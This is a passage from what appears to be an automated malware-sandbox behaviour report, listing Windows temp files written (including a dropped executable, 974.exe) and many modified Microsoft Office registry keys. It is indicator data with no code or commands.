1190. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E8.tmp\\InterconnectedBlockProcess.glox",
1191. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1672.tmp",
1192. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1661.tmp",
1193. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13A9.tmp\\turabian.xsl",
1194. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1673.tmp",
1195. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16C3.tmp",
1196. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16A3.tmp",
1197. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1760.tmp",
1198. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1369.tmp\\gosttitle.xsl",
1199. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF528.tmp",
1200. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1641.tmp\\Insight design set.dotx",
1201. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E0.tmp\\TabList.glox",
1202. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD13E9.tmp\\architecture.glox",
1203. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF100.tmp",
1204. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEAFC.tmp",
1205. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEAFD.tmp",
1206. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1760.tmp\\RadialPictureList.glox",
1207. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1672.tmp\\ThemePictureAlternatingAccent.glox",
1208. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD15E1.tmp\\Metropolitan.thmx",
1209. "C:\\Users\\user\\AppData\\Local\\Temp\\TCDE36.tmp\\pictureorgchart.glox",
1210. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1640.tmp\\PictureFrame.glox",
1211. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF28B.tmp",
1212. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1661.tmp\\TabbedArc.glox",
1213. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16A3.tmp\\Basis.thmx",
1214. "C:\\Users\\user\\AppData\\Local\\Temp\\cab11D1.tmp",
1215. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD1673.tmp\\Main_Event.thmx",
1216. "C:\\Users\\user\\AppData\\Local\\Temp\\TCD16C3.tmp\\Vapor_Trail.thmx",
1217. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF60.tmp",
1218. "C:\\Users\\user\\AppData\\Local\\Temp\\~DFC95D5C527A32B46A.TMP",
1219. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF27A.tmp",
1220. "C:\\Users\\user\\AppData\\Local\\Temp\\cabED27.tmp",
1221. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF3DC.tmp",
1222. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEF82.tmp",
1223. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF2DC.tmp",
1224. "C:\\Users\\user\\AppData\\Local\\Temp\\cabEFE3.tmp",
1225. "C:\\Users\\user\\AppData\\Local\\Temp\\cabF4C9.tmp",
1226. "C:\\Users\\user\\AppData\\Local\\Temp\\~$cs_9b58406a548c3db723f3d6e7370903b7.html",
1227. "C:\\Users\\user\\AppData\\Local\\Temp\\cab1419.tmp",
1228. "C:\\Users\\user\\AppData\\Local\\Temp\\cab1488.tmp",
1229. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS242CD7DB-A850-4C42-BD9B-FD3E2C08771B.tmp",
1230. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Templates\\~$Normal.dotm",
1231. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRSBD4EB3C7-D200-4628-9978-DC6091B8D52B.tmp",
1232. "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9E6F.tmp.cvr",
1233. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF484F5CA0-8D9F-41B2-9799-A6CA34291BC8.tmp",
1234. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF14e77f6.TMP",
1235. "C:\\Users\\user\\974.exe",
1236. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2392.21920250",
1237. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2392.21920250",
1238. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2392.21920265"
1239.  
1240.  
1241. * Modified Registry Keys:
1242. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
1243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
1244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
1245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\5-x",
1246. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\VBAFiles",
1247. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
1248. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
1249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
1250. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
1251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
1252. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\14FF39A",
1253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\14FF39A\\14FF39A",
1254. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
1255. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache",
1256. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\RemoteClearDate",
1257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1",
1258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\Last",
1259. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0",
1260. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\FilePath",
1261. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\StartDate",
1262. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\EndDate",
1263. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Properties",
1264. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Url",
1265. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\LastClean",
1266. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
1267. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
1268. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
1269. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
1270. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
1271. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
1272. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
1273. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
1274. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
1275. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
1276. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
1277. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
1278. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
1279. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
1280. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
1281. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
1282. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
1283. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
1284. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
1285. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
1286. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
1287. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
1288. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
1289. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
1290. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
1291. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
1292. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
1293. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
1294. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
1295. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
1296. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
1297. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
1298. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
1299. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
1300. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
1301. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
1302. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
1303. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
1304. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
1305. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
1306. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
1307. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
1308. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
1309. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
1310. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
1311. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
1312. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
1313. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
1314. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
1315. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
1316. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
1317. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
1318. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
1319. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
1320. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
1321. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
1322. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
1323. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
1324. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
1325. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
1326. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
1327. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
1328. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
1329. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
1330. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
1331. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
1332. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
1333. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
1334. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
1335. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
1336. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
1337. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
1338. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
1339. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
1340. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
1341. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
1342. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
1343. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
1344. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
1345. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
1346. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
1347. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
1348. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
1349. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
1350. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
1351. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
1352. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
1353. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
1354. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
1355. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
1356. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
1357. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
1358. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
1359. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
1360. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
1361. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
1362. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
1363. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
1364. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
1365. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
1366. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
1367. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
1368. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
1369. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
1370. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
1371. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
1372. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
1373. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
1374. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
1375. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
1376. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
1377. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
1378. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
1379. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
1380. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Metadata",
